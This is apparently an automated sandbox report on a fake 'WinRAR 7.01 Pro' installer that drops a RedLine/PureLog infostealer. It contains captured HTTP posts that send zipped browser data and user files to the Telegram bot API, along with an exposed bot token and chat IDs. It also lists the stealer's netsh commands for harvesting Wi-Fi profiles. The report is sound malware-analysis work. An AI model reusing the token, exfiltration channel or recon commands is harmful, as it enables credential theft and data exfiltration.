2024-08-13 19:49:00 UTC	16355	OUT	Data Raw: 9b 7d 9a bf f3 11 ae 90 1f 4e 7d 99 98 7d 7f 16 05 38 7a 94 1c 81 55 d4 79 2f 8a 79 f4 07 66 cd d3 f7 97 fc 15 b8 d9 07 fd b9 69 4d f6 45 56 18 c4 2b e4 c4 70 b7 e9 ca f0 d7 d9 c5 5b af 57 1e ff f8 d6 c4 b8 88 43 0e 48 7b 6e ed 9c dd ae 23 20 4d d0 38 2e b9 4c 1b e8 34 a7 be a7 7c 2c f8 3c 87 ba 3d f6 60 73 d2 ae dc 91 21 9b af fc dd 68 ab 5a bc 72 66 d5 11 0a f0 ee b1 34 e6 5e 91 8f b8 3d e5 b4 e1 80 02 66 f1 1b 33 d8 37 1d 83 55 61 8c c3 03 63 32 4f 58 5a 0b bb fa ef d7 86 3e f5 9f 84 6e 56 8a 90 c6 5b cb 99 0e 1f 89 91 6d c6 94 68 8d 67 f6 70 75 2e 71 24 64 31 8e 7d 68 7b 22 40 1e dd 49 32 f1 e9 3b 71 ab 46 a8 54 fc 5d e1 fd b6 3b 65 8f 1a 4e af ed 73 a6 bf 1d 15 f1 b7 c1 75 0f 7a 09 1b 9b e9 cd ae f0 9b 4e ad 72 79 8e 3b 4f f0 40 d4 98 58 2a 8a fd 58 Data Ascii: }N}}8zUy/yfiMEV+p[WCH{n# M8.L4\|,<=`s!hZrf4^=f37Uac2OXZ>nV[mhgpu.q$d1}h{"@I2;qFT];eNsuzNry;O@X*X
2024-08-13 19:49:00 UTC	16355	OUT	Data Raw: 65 ba 24 3b 75 df 3c 6d 26 33 5f 7c de 8b c2 7e ca 36 6e 31 1e 6f 9d 10 ae bf 6e 85 e6 3a e7 14 78 02 ab ab 38 a0 a9 fa 44 df 94 30 24 17 47 8b 13 12 64 6b 56 22 b8 1d 2f 79 e3 10 3f 7e 9a 81 f7 a6 2a 9a 3c 06 1f bc be 7b 1e 30 7c f2 2a f5 d8 d0 ad a4 24 f8 c1 3e 63 85 aa 98 9f f6 ad c3 35 a7 81 ea 8b 1b 0d 68 7d af d7 0f 9c ba 1e 80 c2 a8 9b 7e e2 37 89 fd 6f 25 5e 37 20 94 67 7d 6d f8 38 0a 9b 0d e9 72 96 6e ec 63 71 d8 09 2d 1b 4f ab 9f 12 36 1c ad 05 fb d9 84 1d 89 47 b0 c1 76 44 2e b7 64 58 c0 ec 9d 69 ca 3d b1 cf 86 24 4d 85 74 d6 48 c9 0d 7f 42 89 da 33 cc 9d d9 f6 db 45 da 68 37 55 b9 57 82 c6 ed da 81 b0 67 25 3d a4 41 da a8 eb ac 13 74 98 69 a5 8e d9 76 df 72 8e 6f 74 5d 1d 11 b1 4e 50 c1 ca ec 04 ab 05 81 2f 54 12 dc d2 d1 12 3e 7a 66 6b 98 a8 Data Ascii: e$;u<m&3_\|~6n1on:x8D0$GdkV"/y?~<{0\|$>c5h}~7o%^7 g}m8rncq-O6GvD.dXi=$MtHB3Eh7UWg%=Ativrot]NP/T>zfk
2024-08-13 19:49:00 UTC	16355	OUT	Data Raw: eb 4b b7 d2 22 c3 94 4d b4 26 b6 87 88 ba 55 85 d2 57 53 d4 35 53 29 22 73 4a 0b c2 9d a5 96 b2 78 45 55 ef 52 a9 cc b1 9c 9a dc 97 33 9c 05 f7 7c 45 56 31 55 5e d8 38 d9 4e a9 0d 52 34 42 a8 03 93 25 ed b3 e3 45 9f c8 69 89 ed 66 56 5c 26 99 7a 98 e6 ef a8 db c0 9a 4a 93 c0 1f d9 7e 34 27 9b 72 05 b3 6a 3a 60 d0 08 07 b4 93 b0 84 c7 28 b0 f8 14 8f 1f 9b fc 24 5b 3c c8 bf a5 ea d7 48 2a af 38 72 6f 70 5b ee 6f 7a 0f 52 ef ba d2 51 e3 36 f6 8b 7d 4d fb ec b7 d7 1b 99 19 35 05 55 54 74 b4 32 69 3d 95 5c 5b 1a b9 71 f8 99 11 8d ae 70 20 34 54 f4 4e ff 78 0a a3 df 88 49 e7 1e 20 1f de 91 15 d8 85 fa 62 7f ad c6 6e 84 e1 32 cc da 11 35 db fd 9a bd c4 75 41 f8 a8 64 bf 2c 5e d2 3c 22 a1 ad 12 74 e2 db 96 15 ed fc 32 df 76 b4 e9 c8 fe b9 ad 0b 10 e6 9f 0a 2e 5e Data Ascii: K"M&UWS5S)"sJxEUR3\|EV1U^8NR4B%EifV\&zJ~4'rj:`($[<H*8rop[ozRQ6}M5UTt2i=\[qp 4TNxI bn25uAd,^<"t2v.^
2024-08-13 19:49:00 UTC	16355	OUT	Data Raw: b7 ee 1f 53 d5 55 dd fb e9 5d 6b 3f b6 d7 5e 6b ed b5 7e bf 95 6d 0d be f3 e0 1a 2b d2 c6 45 97 95 76 c7 e5 61 c2 45 28 86 3e 8d a5 51 0b aa 88 66 15 63 46 93 18 78 25 7b ee d8 a9 d0 7a 3b b8 c3 24 cf 72 9e 64 15 5d 1b 7d d5 93 51 82 f6 d4 9d 44 df a1 89 93 2b 6a a2 f4 60 f2 ed ad 28 ff cf c8 38 59 37 2f ce cf 9a ab 7e 86 21 0f 10 84 4f 82 72 85 e3 25 32 05 4b cb b8 9d 44 33 30 3d 14 7d a7 79 d4 b8 1f a0 39 d0 0f f1 63 83 62 bb 7b ae 65 1a 5a 72 9d ca 97 74 45 9f 28 68 c9 f9 86 f1 a7 07 30 68 f2 4e 61 e6 dd 8e f4 4e 53 d6 cb c2 c9 b0 98 7e 85 13 37 3a 18 8c 7a 61 8f 17 2f d7 c1 c7 ff 4b 13 6c 6f 63 b4 a2 98 b8 5e 27 75 dd 21 77 09 33 4e 31 31 82 75 d3 fa 9b 2d de 67 72 e2 26 71 08 90 d1 fd c3 29 b0 87 f2 6b 55 14 34 41 9e aa 99 62 ba de cd c8 8e 3b 19 39 Data Ascii: SU]k?^k~m+EvaE(>QfcFx%{z;$rd]}QD+j`(8Y7/~!Or%2KD30=}y9cb{eZrtE(h0hNaNS~7:za/Kloc^'u!w3N11u-gr&q)kU4Ab;9
2024-08-13 19:49:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-08-13 19:49:00 UTC	901	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 13 Aug 2024 19:49:00 GMT Content-Type: application/json Content-Length: 513 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":147550,"from":{"id":5912059723,"is_bot":true,"first_name":"Omda","username":"omda404bot"},"chat":{"id":750182271,"first_name":"Mohamed","last_name":"Emad","username":"dukeomda","type":"private"},"date":1723578540,"document":{"file_name":"C_UsersuserAppDataLocal4a3035c4cb9343f74ca34670ddce645duser@52.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAECQF5mu7isLIx4YuZjNPq8VLwV0CeAuwAC8BQAAon74FHH966X42sbaTUE","file_unique_id":"AgAD8BQAAon74FE","file_size":162325}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	149.154.167.220	443	7740	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-13 19:49:01 UTC	254	OUT	POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1 Content-Type: multipart/form-data; boundary="54c32106-8dd3-4cf7-866e-0576783efbb1" Host: api.telegram.org Content-Length: 162674 Expect: 100-continue
2024-08-13 19:49:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-08-13 19:49:01 UTC	40	OUT	Data Raw: 2d 2d 35 34 63 33 32 31 30 36 2d 38 64 64 33 2d 34 63 66 37 2d 38 36 36 65 2d 30 35 37 36 37 38 33 65 66 62 62 31 0d 0a Data Ascii: --54c32106-8dd3-4cf7-866e-0576783efbb1
2024-08-13 19:49:01 UTC	265	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 34 61 33 30 33 35 63 34 63 62 39 33 34 33 66 37 34 63 61 33 34 36 37 30 64 64 63 65 36 34 35 64 5c 6a 6f 6e 65 73 40 35 32 38 31 31 30 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 34 61 33 30 33 35 63 34 63 62 39 33 34 33 66 37 34 63 61 33 34 36 37 30 64 64 63 65 36 34 35 64 25 35 43 6a 6f 6e 65 73 25 34 30 35 32 38 31 31 30 5f 65 6e 2d Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C4a3035c4cb9343f74ca34670ddce645d%5Cuser%40528110_en-
2024-08-13 19:49:01 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 78 ab 0d 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 16 7e 0d 59 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 16 7e 0d 59 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae Data Ascii: PKxYBrowsers\Edge\PK~YQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PK~YceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
2024-08-13 19:49:01 UTC	16355	OUT	Data Raw: 7c 5c fa 6c 7e 05 df 60 ad 15 5c 2e c6 42 65 ed c3 95 75 39 ce ad 30 98 b5 9b 01 13 80 d8 69 88 5b 9d 1e d7 59 c0 10 42 2c d5 27 f6 66 f2 7b 3e a5 7c 1b ea 8e ed 7d 2d cc ad b7 f7 49 3a 59 59 a7 ba ef c3 27 e4 a4 ed 40 85 96 b9 b8 f2 22 f9 55 09 c0 8f f7 59 dd 0f c4 72 ae e5 17 e4 e2 8d 60 71 b7 3e 2a cc 16 47 4e 26 d6 e6 36 88 7e dd 7a 32 e6 df bf ff 50 4b 03 04 14 00 00 00 08 00 54 40 44 57 2f 31 d7 cb 82 02 00 00 02 04 00 00 3e 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 65 73 6b 74 6f 70 5c 4c 54 4b 4d 59 42 53 45 59 5a 5c 4c 54 4b 4d 59 42 53 45 59 5a 2e 64 6f 63 78 0d 53 49 92 45 21 08 db 77 d5 3f 94 02 8a f3 c3 59 ef 7f 90 76 45 89 01 4d 02 b1 87 74 74 a3 73 4f 5c 1a a3 1c 69 96 81 42 49 c3 b6 54 Data Ascii: \|\l~`\.Beu90i[YB,'f{>\|}-I:YY'@"UYr`q>*GN&6~z2PKT@DW/1>Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ\LTKMYBSEYZ.docxSIE!w?YvEMttsO\iBIT
2024-08-13 19:49:01 UTC	16355	OUT	Data Raw: 8c 50 7b a1 ff 28 e0 0a 65 d9 a8 d1 f9 14 a8 4d af da 3d 05 d2 f9 68 5d 6f 64 31 84 61 bb 64 27 8f 2a 44 63 fc d4 8b 22 2e 78 94 52 5b 3e d6 ea de 66 98 1d 6a 7c e5 e3 dd d4 2f 05 97 cd 14 6f a1 56 86 69 fa 03 cf a3 e0 77 26 b4 b7 44 11 fb 37 75 c1 35 1b 3a 17 5e 1f df 36 12 42 91 e6 76 6f 67 c3 81 90 70 6b 1b ef f9 c7 41 e5 cd 3a e7 97 0e 5f 7f 7f fe 00 50 4b 03 04 14 00 00 00 08 00 54 40 44 57 91 6c 91 87 85 02 00 00 02 04 00 00 3f 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4c 54 4b 4d 59 42 53 45 59 5a 5c 5a 42 45 44 43 4a 50 42 45 59 2e 6a 70 67 15 93 49 8e 40 21 08 44 f7 9d f4 a1 04 15 45 71 9e ef 7f 90 fe bd 81 84 05 54 ea 15 0f 8c 46 2e 60 ae 7e 95 70 0d 12 d0 aa a3 9c Data Ascii: P{(eM=h]od1ad'*Dc".xR[>fj\|/oViw&D7u5:^6BvogpkA:_PKT@DWl?Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ\ZBEDCJPBEY.jpgI@!DEqTF.`~p
2024-08-13 19:49:01 UTC	16355	OUT	Data Raw: ad 29 d9 06 8b d1 80 9e 93 2f 9f 5a 67 df b8 9b a2 51 f6 3b 25 ba 00 17 6b 3b 61 1e e2 b4 2d b0 24 2e 73 62 59 58 41 1c c2 a7 d6 23 df 0c a5 f3 03 b8 b1 38 70 c0 00 b0 3a f9 61 20 ef 02 8f d2 0f cc 9d 05 04 0d 15 12 11 d9 f2 e7 aa 21 01 03 c2 ca 6b 10 26 56 50 82 b3 ff 25 17 61 8f dc e0 fd 91 74 b0 e0 04 94 20 20 52 ff 17 2c 0e 3a fc a6 7b 00 16 20 95 c3 30 b0 80 60 82 e4 b8 05 23 81 1e 98 de 27 a2 90 60 fe 87 42 a4 33 4b d0 69 05 27 9d 11 d0 9b 02 70 36 b0 93 18 51 3a 16 89 0b ce 19 83 67 a3 71 64 3e 16 11 48 64 96 1b 8c 41 b3 32 99 88 73 20 b0 48 b8 4e 94 c9 88 83 c4 c2 04 19 1e 7a c1 61 38 42 87 ce 5c 68 80 72 41 15 84 b9 69 4e 0f d1 0c 47 66 ef f5 41 05 70 7c d6 18 dd 63 33 03 89 d9 6d 44 31 ca 74 58 0c 09 89 c7 98 f4 73 68 f1 a9 f5 52 3d 75 9a 01 71 Data Ascii: )/ZgQ;%k;a-$.sbYXA#8p:a !k&VP%at R,:{ 0`#'`B3Ki'p6Q:gqd>HdA2s HNza8B\hrAiNGfAp\|c3mD1tXshR=uq
2024-08-13 19:49:01 UTC	16355	OUT	Data Raw: 9b 7d 9a bf f3 11 ae 90 1f 4e 7d 99 98 7d 7f 16 05 38 7a 94 1c 81 55 d4 79 2f 8a 79 f4 07 66 cd d3 f7 97 fc 15 b8 d9 07 fd b9 69 4d f6 45 56 18 c4 2b e4 c4 70 b7 e9 ca f0 d7 d9 c5 5b af 57 1e ff f8 d6 c4 b8 88 43 0e 48 7b 6e ed 9c dd ae 23 20 4d d0 38 2e b9 4c 1b e8 34 a7 be a7 7c 2c f8 3c 87 ba 3d f6 60 73 d2 ae dc 91 21 9b af fc dd 68 ab 5a bc 72 66 d5 11 0a f0 ee b1 34 e6 5e 91 8f b8 3d e5 b4 e1 80 02 66 f1 1b 33 d8 37 1d 83 55 61 8c c3 03 63 32 4f 58 5a 0b bb fa ef d7 86 3e f5 9f 84 6e 56 8a 90 c6 5b cb 99 0e 1f 89 91 6d c6 94 68 8d 67 f6 70 75 2e 71 24 64 31 8e 7d 68 7b 22 40 1e dd 49 32 f1 e9 3b 71 ab 46 a8 54 fc 5d e1 fd b6 3b 65 8f 1a 4e af ed 73 a6 bf 1d 15 f1 b7 c1 75 0f 7a 09 1b 9b e9 cd ae f0 9b 4e ad 72 79 8e 3b 4f f0 40 d4 98 58 2a 8a fd 58 Data Ascii: }N}}8zUy/yfiMEV+p[WCH{n# M8.L4\|,<=`s!hZrf4^=f37Uac2OXZ>nV[mhgpu.q$d1}h{"@I2;qFT];eNsuzNry;O@X*X
2024-08-13 19:49:01 UTC	16355	OUT	Data Raw: 65 ba 24 3b 75 df 3c 6d 26 33 5f 7c de 8b c2 7e ca 36 6e 31 1e 6f 9d 10 ae bf 6e 85 e6 3a e7 14 78 02 ab ab 38 a0 a9 fa 44 df 94 30 24 17 47 8b 13 12 64 6b 56 22 b8 1d 2f 79 e3 10 3f 7e 9a 81 f7 a6 2a 9a 3c 06 1f bc be 7b 1e 30 7c f2 2a f5 d8 d0 ad a4 24 f8 c1 3e 63 85 aa 98 9f f6 ad c3 35 a7 81 ea 8b 1b 0d 68 7d af d7 0f 9c ba 1e 80 c2 a8 9b 7e e2 37 89 fd 6f 25 5e 37 20 94 67 7d 6d f8 38 0a 9b 0d e9 72 96 6e ec 63 71 d8 09 2d 1b 4f ab 9f 12 36 1c ad 05 fb d9 84 1d 89 47 b0 c1 76 44 2e b7 64 58 c0 ec 9d 69 ca 3d b1 cf 86 24 4d 85 74 d6 48 c9 0d 7f 42 89 da 33 cc 9d d9 f6 db 45 da 68 37 55 b9 57 82 c6 ed da 81 b0 67 25 3d a4 41 da a8 eb ac 13 74 98 69 a5 8e d9 76 df 72 8e 6f 74 5d 1d 11 b1 4e 50 c1 ca ec 04 ab 05 81 2f 54 12 dc d2 d1 12 3e 7a 66 6b 98 a8 Data Ascii: e$;u<m&3_\|~6n1on:x8D0$GdkV"/y?~<{0\|$>c5h}~7o%^7 g}m8rncq-O6GvD.dXi=$MtHB3Eh7UWg%=Ativrot]NP/T>zfk
2024-08-13 19:49:01 UTC	16355	OUT	Data Raw: eb 4b b7 d2 22 c3 94 4d b4 26 b6 87 88 ba 55 85 d2 57 53 d4 35 53 29 22 73 4a 0b c2 9d a5 96 b2 78 45 55 ef 52 a9 cc b1 9c 9a dc 97 33 9c 05 f7 7c 45 56 31 55 5e d8 38 d9 4e a9 0d 52 34 42 a8 03 93 25 ed b3 e3 45 9f c8 69 89 ed 66 56 5c 26 99 7a 98 e6 ef a8 db c0 9a 4a 93 c0 1f d9 7e 34 27 9b 72 05 b3 6a 3a 60 d0 08 07 b4 93 b0 84 c7 28 b0 f8 14 8f 1f 9b fc 24 5b 3c c8 bf a5 ea d7 48 2a af 38 72 6f 70 5b ee 6f 7a 0f 52 ef ba d2 51 e3 36 f6 8b 7d 4d fb ec b7 d7 1b 99 19 35 05 55 54 74 b4 32 69 3d 95 5c 5b 1a b9 71 f8 99 11 8d ae 70 20 34 54 f4 4e ff 78 0a a3 df 88 49 e7 1e 20 1f de 91 15 d8 85 fa 62 7f ad c6 6e 84 e1 32 cc da 11 35 db fd 9a bd c4 75 41 f8 a8 64 bf 2c 5e d2 3c 22 a1 ad 12 74 e2 db 96 15 ed fc 32 df 76 b4 e9 c8 fe b9 ad 0b 10 e6 9f 0a 2e 5e Data Ascii: K"M&UWS5S)"sJxEUR3\|EV1U^8NR4B%EifV\&zJ~4'rj:`($[<H*8rop[ozRQ6}M5UTt2i=\[qp 4TNxI bn25uAd,^<"t2v.^
2024-08-13 19:49:01 UTC	16355	OUT	Data Raw: b7 ee 1f 53 d5 55 dd fb e9 5d 6b 3f b6 d7 5e 6b ed b5 7e bf 95 6d 0d be f3 e0 1a 2b d2 c6 45 97 95 76 c7 e5 61 c2 45 28 86 3e 8d a5 51 0b aa 88 66 15 63 46 93 18 78 25 7b ee d8 a9 d0 7a 3b b8 c3 24 cf 72 9e 64 15 5d 1b 7d d5 93 51 82 f6 d4 9d 44 df a1 89 93 2b 6a a2 f4 60 f2 ed ad 28 ff cf c8 38 59 37 2f ce cf 9a ab 7e 86 21 0f 10 84 4f 82 72 85 e3 25 32 05 4b cb b8 9d 44 33 30 3d 14 7d a7 79 d4 b8 1f a0 39 d0 0f f1 63 83 62 bb 7b ae 65 1a 5a 72 9d ca 97 74 45 9f 28 68 c9 f9 86 f1 a7 07 30 68 f2 4e 61 e6 dd 8e f4 4e 53 d6 cb c2 c9 b0 98 7e 85 13 37 3a 18 8c 7a 61 8f 17 2f d7 c1 c7 ff 4b 13 6c 6f 63 b4 a2 98 b8 5e 27 75 dd 21 77 09 33 4e 31 31 82 75 d3 fa 9b 2d de 67 72 e2 26 71 08 90 d1 fd c3 29 b0 87 f2 6b 55 14 34 41 9e aa 99 62 ba de cd c8 8e 3b 19 39 Data Ascii: SU]k?^k~m+EvaE(>QfcFx%{z;$rd]}QD+j`(8Y7/~!Or%2KD30=}y9cb{eZrtE(h0hNaNS~7:za/Kloc^'u!w3N11u-gr&q)kU4Ab;9
2024-08-13 19:49:02 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Tue, 13 Aug 2024 19:49:02 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Target ID:	0
Start time:	15:48:04
Start date:	13/08/2024
Path:	C:\Users\user\Desktop\WinRAR 7.01 Pro.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WinRAR 7.01 Pro.exe"
Imagebase:	0x50000
File size:	4'492'800 bytes
MD5 hash:	1C8908102946928867AB16F2007B35CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:48:05
Start date:	13/08/2024
Path:	C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe"
Imagebase:	0x7ff6c3b90000
File size:	3'961'960 bytes
MD5 hash:	5E2849BEF6A38ED0B163EA6128AFEA01
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	15:48:10
Start date:	13/08/2024
Path:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe"
Imagebase:	0x400000
File size:	498'688 bytes
MD5 hash:	B2795FBED63C8C1B0846B3EAEAE2FE0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	15:48:51
Start date:	13/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:48:51
Start date:	13/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:48:51
Start date:	13/08/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x5d0000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:48:51
Start date:	13/08/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:48:52
Start date:	13/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0xa0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:48:52
Start date:	13/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:48:52
Start date:	13/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:48:52
Start date:	13/08/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x5d0000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:48:52
Start date:	13/08/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 04C20921 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

8bq, xrefs: 04C209B1

Memory Dump Source

Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: b3ff63a2f6acab7628fadbbc609d2be02b21cf881425ec79c88cfabf62bab09c
Instruction ID: e1dfbd1f0c9fdfd0b01f35d4ce5374a936a7dd77afa123c19466bdced82606c8
Opcode Fuzzy Hash: b3ff63a2f6acab7628fadbbc609d2be02b21cf881425ec79c88cfabf62bab09c
Instruction Fuzzy Hash: D8213674E002099FDB05DFA9D944AEEBFF2EF8D300F24846AD505A7261DB345A89CF91

Function 04C20930 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

8bq, xrefs: 04C209B1

Memory Dump Source

Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 131f5914c0d6d83df41318c9ce14f13b39ffcbf68d1d922944bc2ec36c7836dc
Instruction ID: 5cd987ad6220880c7cbf4f8ede39014b83c68bcdd33b5c25e861746973f623bc
Opcode Fuzzy Hash: 131f5914c0d6d83df41318c9ce14f13b39ffcbf68d1d922944bc2ec36c7836dc
Instruction Fuzzy Hash: A421F574E002099FDB04EFA9D544AEEBBF2AF8C310F10846AD505A7264EB345A85CF91

Function 04C20505 Relevance: .4, Instructions: 439COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

